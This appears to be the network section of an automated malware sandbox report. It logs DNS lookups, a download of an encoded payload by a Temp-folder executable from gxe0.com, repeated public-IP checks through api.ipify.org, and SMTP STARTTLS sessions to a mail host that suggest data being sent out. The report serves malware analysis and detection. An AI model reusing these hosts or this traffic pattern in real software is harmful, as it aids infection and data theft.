Nov 12, 2024 15:28:09.700973988 CET	192.168.2.5	1.1.1.1	0x4b15	Standard query (0)	gxe0.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:28:17.217361927 CET	192.168.2.5	1.1.1.1	0x6294	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:28:21.169820070 CET	192.168.2.5	1.1.1.1	0xcbc	Standard query (0)	s82.gocheapweb.com	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:28:29.406001091 CET	192.168.2.5	1.1.1.1	0x87c7	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:28:37.658745050 CET	192.168.2.5	1.1.1.1	0xa636	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 12, 2024 15:28:09.729794979 CET	1.1.1.1	192.168.2.5	0x4b15	No error (0)	gxe0.com	198.252.105.91	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:28:17.224389076 CET	1.1.1.1	192.168.2.5	0x6294	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:28:17.224389076 CET	1.1.1.1	192.168.2.5	0x6294	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:28:17.224389076 CET	1.1.1.1	192.168.2.5	0x6294	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:28:21.248305082 CET	1.1.1.1	192.168.2.5	0xcbc	No error (0)	s82.gocheapweb.com	51.195.88.199	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:28:29.413589001 CET	1.1.1.1	192.168.2.5	0x87c7	No error (0)	pywolwnvd.biz	54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 12, 2024 15:28:37.667133093 CET	1.1.1.1	192.168.2.5	0xa636	No error (0)	pywolwnvd.biz	54.244.188.177	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

gxe0.com

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	198.252.105.91	443	4308	C:\Users\user\AppData\Local\Temp\x.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-12 14:28:10 UTC	161	OUT	GET /yak/233_Wisrysxlfss HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: gxe0.com
2024-11-12 14:28:10 UTC	365	IN	HTTP/1.1 200 OK Connection: close last-modified: Mon, 28 Oct 2024 23:14:08 GMT accept-ranges: bytes content-length: 2562520 date: Tue, 12 Nov 2024 14:28:10 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-12 14:28:10 UTC	1003	IN	Data Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 51 48 43 59 6b 48 42 41 6e 47 69 4d 6e 46 78 4d 56 4a 52 38 51 44 68 73 67 4a 53 49 67 48 78 49 58 44 68 55 61 49 42 59 61 4a 68 38 52 48 78 49 66 4a 68 77 5a 4a 43 49 6c 44 69 4d 6b 4a 79 4d 66 48 68 6b 61 4a 78 51 51 44 68 41 63 45 53 41 6e 4a 52 30 6c 49 52 51 50 46 69 41 51 4a 52 49 6e 4a 79 49 69 48 53 41 69 49 79 49 52 4a 52 59 63 4a 68 67 6d 48 51 38 52 46 78 49 63 48 42 63 6c 44 78 51 65 44 67 38 58 48 78 77 4f 49 69 45 65 48 52 4d 6a 4a 78 32 6d 72 71 56 5a 49 36 65 78 53 77 51 57 49 42 38 6d 49 43 55 5a 45 79 41 67 70 71 36 6c 57 53 4f 6e 73 55 75 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 Data Ascii: pq6lWSOnsUsQHCYkHBAnGiMnFxMVJR8QDhsgJSIgHxIXDhUaIBYaJh8RHxIfJhwZJCIlDiMkJyMfHhkaJxQQDhAcESAnJR0lIRQPFiAQJRInJyIiHSAiIyIRJRYcJhgmHQ8RFxIcHBclDxQeDg8XHxwOIiEeHRMjJx2mrqVZI6exSwQWIB8mICUZEyAgpq6lWSOnsUupnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbe
2024-11-12 14:28:10 UTC	14994	IN	Data Raw: 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 Data Ascii: muKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uq
2024-11-12 14:28:10 UTC	16384	IN	Data Raw: 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 Data Ascii: 7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mp
2024-11-12 14:28:10 UTC	16384	IN	Data Raw: 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 Data Ascii: qOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1
2024-11-12 14:28:10 UTC	16384	IN	Data Raw: 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 Data Ascii: rmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5
2024-11-12 14:28:10 UTC	16384	IN	Data Raw: 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 Data Ascii: Ke4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0
2024-11-12 14:28:10 UTC	16384	IN	Data Raw: 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a Data Ascii: KSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6Gz
2024-11-12 14:28:11 UTC	16384	IN	Data Raw: 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 Data Ascii: 6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqy
2024-11-12 14:28:11 UTC	16384	IN	Data Raw: 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 Data Ascii: rm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52e
2024-11-12 14:28:11 UTC	387	IN	Data Raw: 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 Data Ascii: KWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisrip

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	104.26.13.205	443	6488	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-12 14:28:18 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-12 14:28:18 UTC	399	IN	HTTP/1.1 200 OK Date: Tue, 12 Nov 2024 14:28:18 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e17352f2c33477c-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1984&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=769&delivery_rate=1388302&cwnd=251&unsent_bytes=0&cid=8eb7d46fea5ee94c&ts=648&x=0"
2024-11-12 14:28:18 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 Data Ascii: 173.254.250.68

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49721	104.26.13.205	443	7592	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-12 14:28:32 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-12 14:28:32 UTC	398	IN	HTTP/1.1 200 OK Date: Tue, 12 Nov 2024 14:28:32 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e1735856e5447ff-DFW server-timing: cfL4;desc="?proto=TCP&rtt=989&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2601976&cwnd=251&unsent_bytes=0&cid=197e4dcd1a40346c&ts=856&x=0"
2024-11-12 14:28:32 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 Data Ascii: 173.254.250.68

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49755	104.26.13.205	443	7928	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-12 14:28:39 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-12 14:28:39 UTC	399	IN	HTTP/1.1 200 OK Date: Tue, 12 Nov 2024 14:28:39 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e1735b48d1947a5-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1105&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2337368&cwnd=251&unsent_bytes=0&cid=d1f0b3101c27b6a0&ts=380&x=0"
2024-11-12 14:28:39 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 Data Ascii: 173.254.250.68

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 12, 2024 15:28:22.175287962 CET	587	49707	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:28:22 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:28:22.176043987 CET	49707	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:28:22.420356035 CET	587	49707	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:28:22.420943022 CET	49707	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:28:22.665380001 CET	587	49707	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 12, 2024 15:28:26.834248066 CET	587	49710	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:28:26 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:28:26.834383965 CET	49710	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:28:26.834752083 CET	587	49710	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:28:26 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:28:27.075897932 CET	587	49710	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:28:27.079176903 CET	49710	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:28:27.320044994 CET	587	49710	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 12, 2024 15:28:34.575484991 CET	587	49737	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:28:34 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:28:34.582412958 CET	49737	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:28:34.823730946 CET	587	49737	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:28:34.823991060 CET	49737	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:28:35.065475941 CET	587	49737	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 12, 2024 15:28:42.214093924 CET	587	49762	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:28:42 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:28:42.214375019 CET	49762	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:28:42.454128027 CET	587	49762	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:28:42.454351902 CET	49762	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:28:42.694175005 CET	587	49762	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 12, 2024 15:28:46.178294897 CET	587	49783	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:28:46 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:28:46.178523064 CET	49783	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:28:46.715003967 CET	587	49783	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:28:46.715420961 CET	49783	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:28:46.715527058 CET	587	49783	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:28:46.955425978 CET	587	49783	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 12, 2024 15:30:24.322674036 CET	587	50786	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:30:23 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:30:24.322762012 CET	587	50786	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:30:23 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:30:24.322813034 CET	50786	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:30:24.570666075 CET	587	50786	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:30:24.571088076 CET	50786	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:30:24.818229914 CET	587	50786	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 12, 2024 15:30:29.413234949 CET	587	50787	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:30:29 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:30:29.413419008 CET	50787	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:30:29.654483080 CET	587	50787	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:30:29.654666901 CET	50787	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:30:29.896200895 CET	587	50787	51.195.88.199	192.168.2.5	220 TLS go ahead
